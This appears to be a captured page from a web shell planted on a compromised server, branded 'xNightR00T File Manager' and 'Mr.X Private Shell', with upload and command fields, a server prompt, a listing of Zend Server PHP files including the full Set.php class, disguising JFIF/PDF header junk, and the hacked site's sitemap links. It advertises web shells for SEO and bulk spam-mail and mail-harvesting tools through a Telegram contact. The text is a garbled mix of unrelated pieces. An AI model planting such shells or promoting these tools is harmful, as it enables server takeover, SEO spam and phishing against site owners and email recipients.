xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer;

class Set implements \ArrayAccess, \Iterator, \Countable
{
    /**
     * @var array
     */
    protected $items;

    /**
     * @var string
     */
    protected $hydrateClass;

    /**
     * @param array $items
     */
    public function __construct(array $items, $hydrateClass = 'ArrayObject')
    {
        $this->items        = $items;
        $this->hydrateClass = $hydrateClass;
        $this->rewind($this->items); // to make current() implementation work
    }
    /* (non-PHPdoc)
     * @see Countable::count()
     */

    public function count()
    {
        return count($this->items);
    }
    /* (non-PHPdoc)
     * @see Iterator::current()
     */

    public function current()
    {
        $current = current($this->items);
        return $this->hydrate($current ? $current : array(), $this->key());
    }
    /* (non-PHPdoc)
     * @see Iterator::key()
     */

    public function key()
    {
        return key($this->items);
    }
    /* (non-PHPdoc)
     * @see Iterator::next()
     */

    public function next()
    {
        $item = next($this->items);
        if ($item === false) {
            return false;
        }
        return $this->hydrate($item, $this->key());
    }
    /* (non-PHPdoc)
     * @see Iterator::rewind()
     */

    public function rewind()
    {
        return reset($this->items);
    }
    /* (non-PHPdoc)
     * @see Iterator::rewind()
     */

    public function end()
    {
        return end($this->items);
    }
    /* (non-PHPdoc)
     * @see Iterator::valid()
     */

    public function valid()
    {
        return current($this->items) !== false;
    }
    /* (non-PHPdoc)
     * @see ArrayAccess::offsetExists()
     */

    public function offsetExists($offset)
    {
        return isset($this->items[$offset]);
    }
    /* (non-PHPdoc)
     * @see ArrayAccess::offsetGet()
     */

    public function offsetGet($offset)
    {
        $info = isset($this->items[$offset]) ? $this->items[$offset] : array();
        return $this->hydrate($info, $offset);
    }
    /* (non-PHPdoc)
     * @see ArrayAccess::offsetSet()
     */

    public function offsetSet($offset, $value)
    {
        $this->items[$offset] = $value;
    }
    /* (non-PHPdoc)
     * @see ArrayAccess::offsetUnset()
     */

    public function offsetUnset($offset)
    {
        unset($this->items[$offset]);
    }

    /**
     * @return array
     */
    public function toArray()
    {
        return $this->items;
    }

    /**
     * @param string $hydrateClass
     */
    public function setHydrateClass($hydrateClass)
    {
        $this->hydrateClass = $hydrateClass;
        return $this;
    }

    /**
     * @param $item
     * @param $key
     */
    private function hydrate($item, $key = null)
    {
        if (is_null($this->hydrateClass)) {
            return $item;
        }

        return new $this->hydrateClass($item, $key);
    }
}

Filemanager

Name Type Size Permission Actions
Authentication Folder 0755
Configuration Folder 0755
Container Folder 0755
Db Folder 0755
FS Folder 0755
Filter Folder 0755
Form Folder 0755
Http Folder 0755
Ini Folder 0755
Log Folder 0755
Mvc Folder 0755
Navigation Folder 0755
PHPUnit Folder 0755
Permissions Folder 0755
Translator Folder 0755
Utils Folder 0755
Validator Folder 0755
View Folder 0755
Collection.php File 2 KB 0644
Edition.php File 1.95 KB 0644
EditionAwareInterface.php File 155 B 0644
Exception.php File 392 B 0644
Set.php File 2.87 KB 0644
Text.php File 1.64 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml